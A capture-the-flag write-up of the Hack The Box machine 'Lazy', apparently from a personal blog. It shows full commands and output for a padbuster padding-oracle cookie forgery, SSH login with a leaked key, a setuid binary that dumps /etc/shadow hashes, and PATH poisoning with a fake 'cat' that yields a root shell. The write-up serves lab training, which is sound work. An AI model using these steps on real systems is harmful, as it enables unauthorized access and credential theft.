HTB: Lazy

Details

This machine is Lazy from Hack The Box

Recon

root@kali:~# nmap -sV -p- -T4 10.10.10.18
Starting Nmap 7.70 ( https://nmap.org ) at 2019-09-29 11:59 EDT
Nmap scan report for 10.10.10.18
Host is up (0.081s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.76 seconds

User

Started at http://10.10.10.18/

Screenshot 1

So I try http://10.10.10.18/register.php

Screenshot 2

I made an account with creds

jack:jackpass

Screenshot 3

This set a cookied with value

cNbtm%2BPFi4NfreviDxCBQyD4I79C6fSF

During my testing, after logging out then in again I ended up with a cookie of

YT%2BNTBW6aP1UefIqeW6ZX5AnL%2Bvy4MH1

I was using burp to test, and when I changed the cookie, by removing some characters from the end, I got

Screenshot 4

So potentially padding oracle, I ran padbuster to test

root@kali:~# padbuster http://10.10.10.18/ YT%2BNTBW6aP1UefIqeW6ZX5AnL%2Bvy4MH1 8 -cookies auth="YT%2BNTBW6aP1UefIqeW6ZX5AnL%2Bvy4MH1" -encoding 0

+-------------------------------------------+
| PadBuster - v0.3.3                        |
| Brian Holyfield - Gotham Digital Science  |
| labs@gdssecurity.com                      |
+-------------------------------------------+

INFO: The original request returned the following
[+] Status: 200
[+] Location: N/A
[+] Content Length: 978

INFO: Starting PadBuster Decrypt Mode
[SNIP]

Block 2 Results:
[+] Cipher Text (HEX): 90272febf2e0c1f5
[+] Intermediate Bytes (HEX): 3f7ef52d7e699e58
[+] Plain Text: k

-------------------------------------------------------
** Finished ***

[+] Decrypted value (ASCII): user=jack

[+] Decrypted value (HEX): 757365723D6A61636B07070707070707

[+] Decrypted value (Base64): dXNlcj1qYWNrBwcHBwcHBw==

-------------------------------------------------------

So it was padding oracle, the cookie set a username, so I tried making one that contained

user=admin

Running padbuster again

padbuster http://10.10.10.18/ YT%2BNTBW6aP1UefIqeW6ZX5AnL%2Bvy4MH1 8 -cookies auth="YT%2BNTBW6aP1UefIqeW6ZX5AnL%2Bvy4MH1" -encoding 0 -plaintext user=admin

+-------------------------------------------+
| PadBuster - v0.3.3                        |
| Brian Holyfield - Gotham Digital Science  |
| labs@gdssecurity.com                      |
+-------------------------------------------+

INFO: The original request returned the following
[+] Status: 200
[+] Location: N/A
[+] Content Length: 978

INFO: Starting PadBuster Encrypt Mode
[+] Number of Blocks: 2

[SNIP]
[+] Success: (135/256) [Byte 1]

Block 1 Results:
[+] New Cipher Text (HEX): 0408ad19d62eba93
[+] Intermediate Bytes (HEX): 717bc86beb4fdefe

-------------------------------------------------------
** Finished ***

[+] Encrypted value is: BAitGdYuupMjA3gl1aFoOwAAAAAAAAAA
-------------------------------------------------------

So I set this as my cookie and went back to http://10.10.10.18/index.php

Screenshot 5

I click the key link, and it offers a file called

mysshkeywithnamemitsos

So the username might be

mitsos

I saved and chmoded the key before testing it on ssh

root@kali:~# ssh mitsos@10.10.10.18 -i ./mysshkeywithnamemitsos
Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Sat Sep 28 23:19:16 EEST 2019

  System load: 0.0               Memory usage: 4%   Processes:       192
  Usage of /:  7.6% of 18.58GB   Swap usage:   0%   Users logged in: 0

  => There is 1 zombie process.

  Graph this data and manage this system at:
    https://landscape.canonical.com/

Last login: Thu Jan 18 10:29:40 2018
mitsos@LazyClown:~$ 

And looked for my flag

mitsos@LazyClown:~$ ls -la
total 64
drwxr-xr-x 5 mitsos mitsos 4096 May  3  2017 .
drwxr-xr-x 3 root   root   4096 May  2  2017 ..
-rwsrwsr-x 1 root   root   7303 May  3  2017 backup
-rw------- 1 mitsos mitsos  224 May  3  2017 .bash_history
-rw-r--r-- 1 root   root      1 May  3  2017 .bash.history
-rw-r--r-- 1 mitsos mitsos  220 May  2  2017 .bash_logout
-rw-r--r-- 1 mitsos mitsos 3637 May  2  2017 .bashrc
drwx------ 2 mitsos mitsos 4096 May  2  2017 .cache
-rw------- 1 mitsos mitsos 2524 May  2  2017 .gdb_history
-rw-rw-r-- 1 mitsos mitsos   22 May  2  2017 .gdbinit
-rw------- 1 root   root     46 May  2  2017 .nano_history
drwxrwxr-x 4 mitsos mitsos 4096 May  2  2017 peda
-rw-r--r-- 1 mitsos mitsos  675 May  2  2017 .profile
drwxrwxr-x 2 mitsos mitsos 4096 May  2  2017 .ssh
-r--r--r-- 1 mitsos mitsos   33 Jan 18  2018 user.txt

mitsos@LazyClown:~$ cat user.txt
[REDACTED]

Root

There was also a suid file called backup

mitsos@LazyClown:~$ file backup
backup: setuid, setgid ELF 32-bit LSB  executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=33d6b5bec96c44e630f37ff41cc1c4a8b2813b6b, not stripped

mitsos@LazyClown:~$ strings backup
[SNIP]
cat /etc/shadow
[SNIP]

It seems to read shadow, so I run it to check

mitsos@LazyClown:~$ ./backup
root:$6$v1daFgo/$.7m9WXOoE4CKFdWvC.8A9aaQ334avEU8KHTmhjjGXMl0CTvZqRfNM5NO2/.7n2WtC58IUOMvLjHL0j4OsDPuL0:17288:0:99999:7:::
daemon:*:17016:0:99999:7:::
bin:*:17016:0:99999:7:::
sys:*:17016:0:99999:7:::
sync:*:17016:0:99999:7:::
games:*:17016:0:99999:7:::
man:*:17016:0:99999:7:::
lp:*:17016:0:99999:7:::
mail:*:17016:0:99999:7:::
news:*:17016:0:99999:7:::
uucp:*:17016:0:99999:7:::
proxy:*:17016:0:99999:7:::
www-data:*:17016:0:99999:7:::
backup:*:17016:0:99999:7:::
list:*:17016:0:99999:7:::
irc:*:17016:0:99999:7:::
gnats:*:17016:0:99999:7:::
nobody:*:17016:0:99999:7:::
libuuid:!:17016:0:99999:7:::
syslog:*:17016:0:99999:7:::
messagebus:*:17288:0:99999:7:::
landscape:*:17288:0:99999:7:::
mitsos:$6$LMSqqYD8$pqz8f/.wmOw3XwiLdqDuntwSrWy4P1hMYwc2MfZ70yA67pkjTaJgzbYaSgPlfnyCLLDDTDSoHJB99q2ky7lEB1:17288:0:99999:7:::
mysql:!:17288:0:99999:7:::
sshd:*:17288:0:99999:7:::

Importantly, it ran cat without a full path. So I can carry out PATH poisoning

mitsos@LazyClown:~$ cd /tmp

mitsos@LazyClown:/tmp$ echo "/bin/sh" > cat

mitsos@LazyClown:/tmp$ chmod +x cat

mitsos@LazyClown:/tmp$ export PATH=/tmp:$PATH

mitsos@LazyClown:/tmp$ /home/mitsos/backup
#

This popped me a shell

# id
uid=1000(mitsos) gid=1000(mitsos) euid=0(root) egid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare),1000(mitsos)

It was a root shell, so I grabbed my flag

# cd /root

# ls -la
total 40
drwx------  3 root root 4096 Dec 24  2017 .
drwxr-xr-x 21 root root 4096 May  2  2017 ..
-rw-------  1 root root    1 Dec 24  2017 .bash_history
-rw-r--r--  1 root root 3106 Feb 20  2014 .bashrc
drwx------  2 root root 4096 May  3  2017 .cache
-rw-------  1 root root   72 May  2  2017 .mysql_history
-rw-------  1 root root   15 May  5  2017 .nano_history
-rw-r--r--  1 root root  140 Feb 20  2014 .profile
-r--------  1 root root   33 May  3  2017 root.txt
-rw-------  1 root root  647 Dec 24  2017 .viminfo

Used the full path of cat to get the flag as PATH is still poisoned

# /bin/cat ./root.txt
[REDACTED]

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.